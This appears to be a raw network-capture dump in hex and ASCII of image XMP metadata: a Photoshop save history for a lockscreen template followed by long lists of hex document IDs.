                                                                                                                                                                                    Data Ascii: 7D5720C969D4243149667.psb saved&#xA;2018-03-12T14:50:16-07:00&#x9;File Lockscreen_1080x1920_Portrait.psd closed&#xA;2018-03-12T14:50:16-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\__Templates\Lockscreen_1080x1920_Portrait.psd saved&#xA;2018-03-15T00:46:
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9145INData Raw: 3c 72 64 66 3a 6c 69 3e 30 34 32 30 44 35 45 38 31 31 39 35 38 31 34 41 34 31 43 32 35 33 41 43 34 35 36 44 39 34 34 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 34 34 30 39 37 45 36 43 34 43 39 33 45 36 42 34 45 39 37 46 30 30 36 30 31 31 43 45 33 33 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 34 35 42 39 41 43 32 32 32 32 34 39 37 39 38 44 30 39 32 39 37 39 38 41 42 30 41 31 35 44 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 34 35 43 44 43 34 30 44 31 34 42 46 38 31 46 30 36 43 35 32 41 32 33 31 37 44 37 32 33 44 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 34 36 31 38 37 42 30 31 33 38 39 31 37 32 41 43 42 31 41 39 37 44 34 36 37 39 37 45 31 36 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a
                                                                                                                                                                                    Data Ascii: <rdf:li>0420D5E81195814A41C253AC456D944E</rdf:li> <rdf:li>044097E6C4C93E6B4E97F006011CE331</rdf:li> <rdf:li>045B9AC222249798D0929798AB0A15D2</rdf:li> <rdf:li>045CDC40D14BF81F06C52A2317D723DB</rdf:li> <rdf:li>046187B01389172ACB1A97D46797E16C</rdf:li> <rdf:
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9161INData Raw: 41 35 39 30 45 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 31 35 36 46 44 30 46 32 43 34 30 30 42 37 41 32 32 32 39 31 31 33 37 39 46 45 43 38 42 45 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 31 36 32 46 32 45 41 41 32 43 45 41 37 30 33 35 31 38 35 34 41 42 30 43 30 37 45 32 30 44 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 31 36 33 32 36 31 39 45 41 39 44 36 37 45 38 33 34 30 31 43 44 46 46 44 31 32 35 30 34 31 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 31 37 35 43 35 45 34 45 34 30 31 46 35 37 32 46 44 45 45 32 31 45 36 37 33 34 35 32 38 45 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 31 38 33 33 31 32 32 36 41 42 45 45 43 46 45 30 38 33 43 43 31 31 30 34 32 30 33 41 41 37
                                                                                                                                                                                    Data Ascii: A590E5</rdf:li> <rdf:li>1156FD0F2C400B7A222911379FEC8BEF</rdf:li> <rdf:li>1162F2EAA2CEA70351854AB0C07E20D5</rdf:li> <rdf:li>11632619EA9D67E83401CDFFD125041A</rdf:li> <rdf:li>1175C5E4E401F572FDEE21E6734528E1</rdf:li> <rdf:li>118331226ABEECFE083CC1104203AA7
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9169INData Raw: 34 39 43 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 37 39 42 45 45 41 37 45 32 34 46 30 31 44 35 42 33 35 43 31 43 34 34 41 34 44 38 46 31 39 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 37 39 43 39 32 32 32 38 33 33 39 35 32 38 34 31 41 45 31 38 43 34 44 35 31 44 36 37 44 46 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 37 41 35 30 36 35 44 31 30 38 36 45 31 41 41 44 41 30 41 30 44 41 36 34 32 36 33 39 43 38 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 37 41 43 36 35 31 44 42 39 32 44 32 42 44 39 34 34 44 46 42 41 46 37 31 32 39 35 32 41 39 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 37 42 36 42 39 45 45 43 36 45 46 35 34 35 39 31 44 33 42 42 39 39 42 42 38 30 37 35 42 45 41 3c
                                                                                                                                                                                    Data Ascii: 49C5</rdf:li> <rdf:li>179BEEA7E24F01D5B35C1C44A4D8F193</rdf:li> <rdf:li>179C9222833952841AE18C4D51D67DF3</rdf:li> <rdf:li>17A5065D1086E1AADA0A0DA642639C8B</rdf:li> <rdf:li>17AC651DB92D2BD944DFBAF712952A99</rdf:li> <rdf:li>17B6B9EEC6EF54591D3BB99BB8075BEA<
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9185INData Raw: 38 39 39 35 31 36 42 45 32 46 39 31 45 46 31 30 36 31 46 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 44 31 43 30 32 34 36 33 42 30 37 31 34 45 42 37 35 36 34 39 34 44 32 36 31 35 32 44 32 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 44 34 33 39 41 36 34 34 42 42 37 39 44 35 41 44 37 46 39 30 43 41 37 41 37 42 45 32 43 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 44 44 38 37 30 43 41 30 33 45 39 30 44 43 30 34 32 43 37 33 44 43 44 45 45 33 38 32 42 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 45 36 37 32 39 35 30 39 42 45 44 32 42 43 42 41 46 46 37 43 36 31 33 39 41 45 39 41 35 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 35 46 32 39 34 32 31 33 31 38 39 31 30 33 45 31
                                                                                                                                                                                    Data Ascii: 899516BE2F91EF1061F6</rdf:li> <rdf:li>25D1C02463B0714EB756494D26152D26</rdf:li> <rdf:li>25D439A644BB79D5AD7F90CA7A7BE2CF</rdf:li> <rdf:li>25DD870CA03E90DC042C73DCDEE382B6</rdf:li> <rdf:li>25E6729509BED2BCBAFF7C6139AE9A50</rdf:li> <rdf:li>25F294213189103E1
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9201INData Raw: 36 31 44 42 34 31 42 34 34 39 35 42 41 43 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 31 43 44 31 39 41 36 38 37 33 35 35 35 41 39 42 36 39 45 46 33 41 33 36 42 41 43 46 43 34 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 32 31 39 41 37 37 42 30 43 37 31 31 33 41 42 45 30 34 39 32 30 36 34 38 36 36 36 38 32 42 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 32 31 44 43 34 38 30 31 39 43 43 46 43 34 36 43 32 31 33 43 45 36 34 34 42 42 32 34 36 45 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 32 33 32 46 31 45 37 43 45 45 30 35 41 41 43 30 41 35 44 44 35 42 44 46 34 31 38 45 34 31 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 32 33 39 33 34 41 41 36 35 38 30 34 35 39 31 33 42 33 35 32 43
                                                                                                                                                                                    Data Ascii: 61DB41B4495BAC9</rdf:li> <rdf:li>31CD19A6873555A9B69EF3A36BACFC48</rdf:li> <rdf:li>3219A77B0C7113ABE0492064866682B7</rdf:li> <rdf:li>321DC48019CCFC46C213CE644BB246E7</rdf:li> <rdf:li>3232F1E7CEE05AAC0A5DD5BDF418E418</rdf:li> <rdf:li>323934AA658045913B352C
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9208INData Raw: 32 39 32 35 39 32 42 44 46 31 36 31 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 38 46 30 39 46 33 34 46 33 30 30 45 45 42 33 35 32 44 30 33 43 42 38 44 41 34 45 43 44 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 39 39 34 39 39 35 30 43 43 37 37 32 32 38 38 44 36 43 37 30 38 33 34 46 37 30 45 39 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 42 30 39 46 35 41 36 34 32 43 41 43 39 36 34 30 31 45 42 35 46 39 34 34 38 43 30 38 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 42 32 45 33 30 33 41 31 45 37 37 32 41 30 46 46 34 46 33 34 42 37 30 38 37 46 34 36 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 38 43 45 32 32 34 46 34 37 41 43 35 45 37 37 37 44 45 30 34 45 38 30
                                                                                                                                                                                    Data Ascii: 292592BDF161B</rdf:li> <rdf:li>388F09F34F300EEB352D03CB8DA4ECD8</rdf:li> <rdf:li>389949950CC772288D6C70834F70E9D7</rdf:li> <rdf:li>38B09F5A642CAC96401EB5F9448C0883</rdf:li> <rdf:li>38B2E303A1E772A0FF4F34B7087F46B2</rdf:li> <rdf:li>38CE224F47AC5E777DE04E80
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9224INData Raw: 35 35 46 39 41 46 37 30 46 36 33 45 35 32 36 37 37 31 46 39 39 37 43 31 39 44 33 44 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 35 38 43 46 34 33 38 45 32 38 41 38 44 41 39 36 43 39 33 45 30 31 34 46 31 36 46 46 44 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 35 41 30 36 31 38 30 36 38 45 34 37 35 38 36 32 30 35 30 42 31 44 34 34 33 31 42 34 44 34 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 35 41 30 46 34 37 43 35 35 43 32 32 43 44 43 31 46 43 45 33 38 37 32 42 33 35 30 31 30 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 35 41 42 39 33 30 33 38 37 35 35 35 37 46 35 43 46 35 32 31 34 44 43 33 31 39 35 30 45 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 35 43 37 30 33 45 46
                                                                                                                                                                                    Data Ascii: 55F9AF70F63E526771F997C19D3DF</rdf:li> <rdf:li>458CF438E28A8DA96C93E014F16FFDA5</rdf:li> <rdf:li>45A0618068E475862050B1D4431B4D47</rdf:li> <rdf:li>45A0F47C55C22CDC1FCE3872B3501003</rdf:li> <rdf:li>45AB9303875557F5CF5214DC31950E96</rdf:li> <rdf:li>45C703EF
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9240INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 32 39 35 43 31 34 45 33 41 32 45 41 39 37 34 38 45 33 39 32 41 38 45 35 37 36 37 45 44 44 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 32 39 39 42 33 43 32 45 37 44 42 46 31 34 35 33 36 39 31 42 39 42 35 30 37 42 44 33 33 43 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 32 39 46 36 34 39 32 44 42 34 46 39 31 44 34 43 36 36 46 39 45 35 30 46 32 36 42 42 37 46 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 32 41 32 31 39 32 37 45 38 45 46 30 38 35 37 33 36 42 30 41 33 34 32 35 46 36 33 35 41 38 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 32 41 43 35 43 39 30 33 42 42 30 36 42 32 42 36 45 35 41 43 39 41 39 36 35 45 43 30 42 37 36 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>5295C14E3A2EA9748E392A8E5767EDD5</rdf:li> <rdf:li>5299B3C2E7DBF1453691B9B507BD33CB</rdf:li> <rdf:li>529F6492DB4F91D4C66F9E50F26BB7F5</rdf:li> <rdf:li>52A21927E8EF085736B0A3425F635A85</rdf:li> <rdf:li>52AC5C903BB06B2B6E5AC9A965EC0B76</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9248INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 39 36 44 39 45 37 41 37 37 43 41 43 35 46 33 43 45 41 39 32 46 41 33 39 34 44 33 44 33 34 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 39 37 32 36 41 34 35 34 46 44 31 31 33 42 36 43 41 44 33 44 35 44 30 32 34 33 45 43 33 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 39 38 44 34 45 37 38 42 30 38 43 44 33 33 38 32 36 38 34 42 45 31 35 30 39 43 33 31 30 44 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 39 38 44 35 42 39 46 33 34 41 45 46 46 43 35 33 43 34 35 35 30 44 31 41 30 38 46 42 32 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 39 39 31 37 39 35 46 45 45 32 45 41 30 35 31 44 44 33 45 37 46 37 36 46 43 44 38 33 44 34 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: i> <rdf:li>596D9E7A77CAC5F3CEA92FA394D3D340</rdf:li> <rdf:li>59726A454FD113B6CAD3D5D0243EC32F</rdf:li> <rdf:li>598D4E78B08CD3382684BE1509C310D5</rdf:li> <rdf:li>598D5B9F34AEFFC53C4550D1A08FB2F9</rdf:li> <rdf:li>5991795FEE2EA051DD3E7F76FCD83D48</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9264INData Raw: 64 66 3a 6c 69 3e 36 37 42 43 41 37 31 31 33 32 34 32 32 42 30 44 45 44 30 31 46 46 36 34 30 30 33 44 32 39 30 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 37 44 32 31 35 37 44 36 37 33 36 37 39 33 37 37 36 45 44 35 31 30 42 35 35 32 32 31 46 46 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 37 45 31 31 42 39 30 33 39 31 31 42 36 37 36 43 33 46 43 32 45 39 31 42 34 43 36 45 43 32 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 37 45 31 45 35 35 34 42 45 44 35 41 45 35 35 32 36 31 43 37 44 36 42 30 35 32 39 31 46 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 36 37 45 33 37 39 34 34 35 37 38 39 36 35 36 36 34 31 43 34 30 41 33 31 39 33 32 31 45 31 41 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li>67BCA71132422B0DED01FF64003D2904</rdf:li> <rdf:li>67D2157D6736793776ED510B55221FFD</rdf:li> <rdf:li>67E11B903911B676C3FC2E91B4C6EC24</rdf:li> <rdf:li>67E1E554BED5AE55261C7D6B05291F63</rdf:li> <rdf:li>67E379445789656641C40A319321E1AC</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9280INData Raw: 32 46 36 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 35 46 37 45 39 36 31 33 42 31 44 32 46 41 31 41 34 34 35 37 32 30 45 37 46 31 37 39 42 44 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 35 46 44 44 42 34 39 42 39 34 34 31 38 31 32 37 30 44 37 34 37 36 42 34 36 42 39 31 32 44 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 36 30 46 43 46 45 42 45 30 35 45 44 31 42 36 39 45 36 33 36 45 34 34 33 31 46 38 36 35 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 36 31 33 34 45 36 34 33 45 36 42 44 39 37 44 39 41 35 33 31 41 46 41 30 46 36 43 42 35 34 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 36 31 36 42 36 44 35 42 38 41 42 38 39 31 42 44 43 45 44 46 30 44 38 43 41 36 34 37 46 44 34 3c
                                                                                                                                                                                    Data Ascii: 2F6F</rdf:li> <rdf:li>75F7E9613B1D2FA1A445720E7F179BDA</rdf:li> <rdf:li>75FDDB49B944181270D7476B46B912D9</rdf:li> <rdf:li>760FCFEBE05ED1B69E636E4431F865FC</rdf:li> <rdf:li>76134E643E6BD97D9A531AFA0F6CB549</rdf:li> <rdf:li>7616B6D5B8AB891BDCEDF0D8CA647FD4<
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9288INData Raw: 30 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 37 33 36 38 35 42 39 37 35 30 45 41 46 32 35 35 44 36 45 46 42 38 39 38 30 37 38 39 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 39 39 45 41 39 31 32 36 39 45 33 36 36 30 44 45 41 41 36 42 34 33 42 36 34 44 36 35 38 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 39 44 34 32 45 44 43 34 35 37 34 30 35 30 43 30 33 37 44 31 39 39 31 30 42 33 39 37 32 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 42 45 39 38 35 36 41 30 39 42 33 30 35 30 35 43 33 44 36 38 46 44 31 44 35 45 46 43 42 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 37 43 43 30 35 44 32 38 39 43 37 31 42 36 46 46 31 37 38 31 36 46 37 31 36 39 46 41 32 46 44 33 3c 2f 72
                                                                                                                                                                                    Data Ascii: 0E</rdf:li> <rdf:li>7C73685B9750EAF255D6EFB8980789F9</rdf:li> <rdf:li>7C99EA91269E3660DEAA6B43B64D6588</rdf:li> <rdf:li>7C9D42EDC4574050C037D19910B3972F</rdf:li> <rdf:li>7CBE9856A09B30505C3D68FD1D5EFCB1</rdf:li> <rdf:li>7CC05D289C71B6FF17816F7169FA2FD3</r
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9304INData Raw: 34 32 38 37 33 33 39 41 43 37 39 46 36 30 38 33 43 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 39 32 32 41 38 37 44 35 39 44 36 33 44 32 42 36 45 31 36 31 36 45 39 43 42 32 39 45 36 44 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 39 34 35 31 44 37 32 44 41 36 44 38 31 42 36 34 46 44 33 33 44 46 32 31 45 33 30 42 43 30 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 39 34 37 31 41 30 44 46 46 46 36 35 32 39 41 36 36 38 32 38 35 31 44 30 41 30 34 41 42 37 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 39 34 38 41 30 32 30 46 33 30 32 32 39 43 39 44 37 46 39 46 41 42 41 45 33 43 43 35 31 44 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 38 39 34 38 43 34 35 39 39 35 41 32 38 43 41 43 45 37 46
                                                                                                                                                                                    Data Ascii: 4287339AC79F6083C9</rdf:li> <rdf:li>8922A87D59D63D2B6E1616E9CB29E6D1</rdf:li> <rdf:li>89451D72DA6D81B64FD33DF21E30BC06</rdf:li> <rdf:li>89471A0DFFF6529A6682851D0A04AB79</rdf:li> <rdf:li>8948A020F30229C9D7F9FABAE3CC51D6</rdf:li> <rdf:li>8948C45995A28CACE7F
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9320INData Raw: 69 3e 39 37 41 32 37 33 41 43 36 36 35 35 44 30 42 38 37 46 44 36 45 33 37 31 33 39 30 33 38 36 36 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 37 42 32 41 30 45 45 38 43 32 43 31 41 42 41 34 38 32 32 36 33 32 42 42 36 39 36 38 36 36 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 37 44 36 41 44 44 35 32 37 44 39 38 38 32 34 46 45 46 38 46 34 45 44 31 34 32 34 35 36 41 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 37 44 37 36 44 44 45 32 32 32 34 41 34 33 44 34 41 31 45 36 31 43 41 36 37 36 43 46 44 36 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 37 44 41 39 43 32 36 33 39 46 42 38 34 34 42 35 31 37 34 30 42 42 30 42 39 42 30 46 39 38 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 37 45
                                                                                                                                                                                    Data Ascii: i>97A273AC6655D0B87FD6E37139038666</rdf:li> <rdf:li>97B2A0EE8C2C1ABA4822632BB6968660</rdf:li> <rdf:li>97D6ADD527D98824FEF8F4ED142456A2</rdf:li> <rdf:li>97D76DDE2224A43D4A1E61CA676CFD65</rdf:li> <rdf:li>97DA9C2639FB844B51740BB0B9B0F982</rdf:li> <rdf:li>97E
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9328INData Raw: 33 39 34 36 30 45 36 34 41 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 44 46 32 31 37 41 34 33 44 32 34 33 43 34 31 37 37 38 32 39 31 34 45 43 36 32 35 36 44 42 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 44 46 33 33 46 38 36 37 39 39 39 31 43 33 32 36 35 39 46 45 39 36 30 35 42 30 44 46 38 36 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 45 30 34 46 36 38 33 32 38 37 42 46 38 35 36 43 44 36 34 35 34 46 36 42 37 33 30 30 44 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 45 30 38 33 31 32 39 41 45 36 44 45 41 45 45 36 31 33 31 32 44 41 38 39 35 33 43 31 31 32 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 39 45 30 38 45 41 45 42 31 32 38 30 43 37 30 33 32 30 44 32 35 32 42 42 30 30
                                                                                                                                                                                    Data Ascii: 39460E64AF9</rdf:li> <rdf:li>9DF217A43D243C417782914EC6256DBF</rdf:li> <rdf:li>9DF33F8679991C32659FE9605B0DF864</rdf:li> <rdf:li>9E04F683287BF856CD6454F6B7300D42</rdf:li> <rdf:li>9E083129AE6DEAEE61312DA8953C1120</rdf:li> <rdf:li>9E08EAEB1280C70320D252BB00
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9344INData Raw: 45 33 43 44 32 36 36 38 43 39 43 44 35 35 32 33 42 43 32 35 32 43 38 37 31 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 42 35 42 30 32 45 34 32 44 41 32 46 33 42 33 41 46 46 37 44 32 43 43 36 31 44 36 43 44 41 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 42 35 43 32 35 39 43 39 37 33 31 38 45 42 31 30 37 42 36 33 38 41 31 45 31 42 32 30 46 43 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 42 37 30 32 31 36 43 34 44 30 37 31 43 45 37 44 44 32 36 30 32 41 41 42 41 34 33 31 32 36 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 42 37 33 38 30 31 38 41 32 34 34 35 38 38 44 37 36 34 42 45 31 33 34 41 36 36 35 46 39 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 41 42 38 33 42 46 43 31 35 33
                                                                                                                                                                                    Data Ascii: E3CD2668C9CD5523BC252C8712C</rdf:li> <rdf:li>AB5B02E42DA2F3B3AFF7D2CC61D6CDA4</rdf:li> <rdf:li>AB5C259C97318EB107B638A1E1B20FCE</rdf:li> <rdf:li>AB70216C4D071CE7DD2602AABA43126D</rdf:li> <rdf:li>AB738018A244588D764BE134A665F961</rdf:li> <rdf:li>AB83BFC153
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9360INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 38 39 39 42 44 33 38 37 32 43 42 36 45 33 30 41 37 36 34 34 31 33 37 42 34 30 44 38 42 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 38 39 41 39 36 37 31 41 38 42 41 39 38 43 37 36 41 44 43 44 42 39 34 41 38 31 43 43 30 30 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 38 41 32 35 31 43 46 37 39 45 44 36 30 34 37 32 31 36 37 35 46 32 42 31 43 45 31 31 42 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 38 41 39 31 46 43 31 43 39 37 42 39 35 35 37 32 33 36 36 37 38 45 39 45 34 39 42 35 38 32 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 38 42 36 39 46 43 34 35 31 39 43 37 32 38 33 32 32 34 41 31 41 36 32 45 36 43 41 37 31 39 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72
                                                                                                                                                                                    Data Ascii: i> <rdf:li>B899BD3872CB6E30A7644137B40D8B89</rdf:li> <rdf:li>B89A9671A8BA98C76ADCDB94A81CC000</rdf:li> <rdf:li>B8A251CF79ED604721675F2B1CE11BD7</rdf:li> <rdf:li>B8A91FC1C97B9557236678E9E49B5820</rdf:li> <rdf:li>B8B69FC4519C7283224A1A62E6CA7191</rdf:li> <r
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9367INData Raw: 20 3c 72 64 66 3a 6c 69 3e 42 46 38 30 46 34 46 33 34 44 32 43 41 39 32 39 46 30 37 30 42 32 44 41 37 43 39 38 43 37 38 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 38 41 39 41 37 30 33 43 33 41 42 43 32 38 35 41 43 37 42 44 39 35 45 46 39 43 34 37 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 38 45 37 45 46 41 41 33 46 44 43 44 38 33 38 32 37 37 43 45 42 38 32 36 33 46 43 39 41 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 39 31 44 38 36 45 36 36 42 33 37 38 41 42 45 43 45 39 41 44 39 42 32 37 44 45 32 42 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 42 46 39 42 42 35 31 31 44 38 43 32 39 34 43 43 42 44 45 33 43 30 37 46 46 32 36 42 31 33 33 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66
                                                                                                                                                                                    Data Ascii: <rdf:li>BF80F4F34D2CA929F070B2DA7C98C78F</rdf:li> <rdf:li>BF8A9A703C3ABC285AC7BD95EF9C4787</rdf:li> <rdf:li>BF8E7EFAA3FDCD838277CEB8263FC9A5</rdf:li> <rdf:li>BF91D86E66B378ABECE9AD9B27DE2B03</rdf:li> <rdf:li>BF9BB511D8C294CCBDE3C07FF26B133C</rdf:li> <rdf
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9369INData Raw: 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 30 42 31 44 33 42 34 45 45 38 35 31 41 35 36 36 44 46 30 37 43 38 42 41 42 31 46 35 44 45 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 30 42 41 46 41 44 36 36 33 31 44 33 42 39 42 36 46 42 34 35 43 43 46 37 34 41 33 36 37 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 30 43 39 45 45 44 32 33 37 32 32 41 41 34 38 37 45 34 45 43 42 37 44 35 37 41 42 33 35 35 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 30 44 30 35 31 31 41 43 43 39 45 46 31 34 43 45 38 42 42 33 36 38 46 42 36 38 45 32 44 32 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 30 46 45 41 